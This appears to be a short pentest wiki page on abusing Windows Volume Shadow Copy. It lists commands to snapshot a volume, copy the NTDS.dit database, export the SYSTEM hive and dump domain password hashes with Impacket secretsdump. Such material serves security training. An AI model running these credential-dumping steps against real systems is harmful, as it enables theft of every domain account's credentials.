search

Shadow Copy

Shadow Copy A.K.A Volume Shadow Copy Service (VSS) in Windows is a feature that creates backup snapshots of files or entire volumes while they are in use. Originally designed for quick backups and to enable file versioning in case of accidental deletion or data corruption.

Attackers often leverage this feature to access sensitive files, like the NTDS database, which contains user credentials, without alerting security systems.

circle-exclamation

Note: shadow copy requires Administrative or SYSTEM Privileges

hashtag
Steps for shadow copy:

  1. Create a Shadow Copy.

vshadow.exe -nw -p  C:

  1. Copy ntds.dit file.

copy <shadow_path>\windows\ntds\ntds.dit c:\ntds.dit.bak

  1. Export the SYSTEM Hive - necessary for decrypting NTDS hashes.

reg save hklm\system c:\system.bak

  1. Extract hashes Finally using Impacket’s secretsdump.

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

PreviousGolden TicketNextAuthentication Attacks

Last updated